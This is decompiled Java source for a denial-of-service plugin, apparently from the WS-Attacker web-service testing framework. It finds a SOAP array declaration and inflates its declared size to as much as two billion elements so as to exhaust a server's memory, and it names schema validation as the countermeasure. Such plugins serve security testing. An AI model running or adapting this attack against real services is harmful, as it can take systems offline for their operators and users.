/*
 * Decompiled with CFR 0.152.
 */
package wsattacker.plugin.dos;

import java.util.HashMap;
import java.util.Map;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
import wsattacker.main.composition.plugin.option.AbstractOption;
import wsattacker.main.composition.plugin.option.AbstractOptionInteger;
import wsattacker.main.plugin.option.OptionLimitedInteger;
import wsattacker.plugin.dos.dosExtension.abstractPlugin.AbstractDosPlugin;
import wsattacker.plugin.dos.dosExtension.option.OptionTextAreaSoapMessage;

public class SoapArrayAttack
extends AbstractDosPlugin {
    private static final long serialVersionUID = 1L;
    private AbstractOptionInteger optionNumberArrayElements;

    @Override
    public void initializeDosPlugin() {
        this.initData();
        this.optionNumberArrayElements = new OptionLimitedInteger("Number of SOAP array elements", 1000000000, "The number of SOAP array elements to be created", 1, 2000000000);
        this.getPluginOptions().add((AbstractOption)this.optionNumberArrayElements);
    }

    @Override
    public OptionTextAreaSoapMessage.PayloadPosition getPayloadPosition() {
        return OptionTextAreaSoapMessage.PayloadPosition.NONE;
    }

    public void initData() {
        this.setName("SOAP Array Attack");
        this.setDescription("<html><p>This attack checks whether or not a Web service is vulnerable to the \"Soap Array\" attack. In order for this attack to work the attacked Web service has to excpect a SOAP array. Otherwise any SOAP array will be ignored and the attack won't work.</p><p>A detailed description of the attack can be found on <a href=\"http://clawslab.nds.rub.de/wiki/index.php/Soap_Array_Attack\">http://clawslab.nds.rub.de/wiki/index.php/Soap_Array_Attack</a></p><p>The attack algorithm will automatically search for any SOAP array and will change the array size to the value defined in parameter 8.</p></html>");
        this.setCountermeasures("In order to counter the attack, strict schema validation has to be performed that limits the array size. See http://clawslab.nds.rub.de/wiki/index.php/Soap_Array_Attack for more detailed countermeasures.");
    }

    @Override
    public boolean attackPrecheck() {
        String regex1 = "arrayType=\"[A-Za-z0-9:_-]*\\x5B";
        Pattern p1 = Pattern.compile(regex1);
        Matcher m1 = p1.matcher(this.getOriginalRequest().getRequestContent());
        if (m1.find()) {
            this.setAttackPrecheck(true);
            return true;
        }
        this.setAttackPrecheck(false);
        return false;
    }

    @Override
    public void createTamperedRequest() {
        String stringSOAPMessage = this.getOptionTextAreaSoapMessage().getValue();
        String regex1 = "arrayType=\"[A-Za-z0-9:_-]*\\x5B";
        Pattern p1 = Pattern.compile(regex1);
        Matcher m1 = p1.matcher(stringSOAPMessage);
        if (m1.find()) {
            int lengthFirstpart = m1.end();
            String firstPart = stringSOAPMessage.substring(0, lengthFirstpart);
            String lastPart = stringSOAPMessage.substring(lengthFirstpart, stringSOAPMessage.length());
            String regex2 = "^[0-9]*\\x5D";
            Pattern p2 = Pattern.compile(regex2);
            Matcher m2 = p2.matcher(lastPart);
            if (m2.find()) {
                lastPart = m2.replaceFirst("]");
            } else {
                this.setAttackPrecheck(false);
            }
            StringBuilder sb = new StringBuilder();
            sb.append(firstPart);
            sb.append(this.optionNumberArrayElements.getValue());
            sb.append(lastPart);
            HashMap<String, String> httpHeaderMap = new HashMap<String, String>();
            for (Map.Entry<String, String> entry : this.getOriginalRequestHeaderFields().entrySet()) {
                httpHeaderMap.put(entry.getKey(), entry.getValue());
            }
            this.setTamperedRequestObject(httpHeaderMap, this.getOriginalRequest().getEndpoint(), sb.toString());
        } else {
            Map<String, String> httpHeaderMap = this.getOriginalRequestHeaderFields();
            this.setTamperedRequestObject(httpHeaderMap, this.getOriginalRequest().getEndpoint(), stringSOAPMessage);
            this.setAttackPrecheck(false);
        }
    }
}

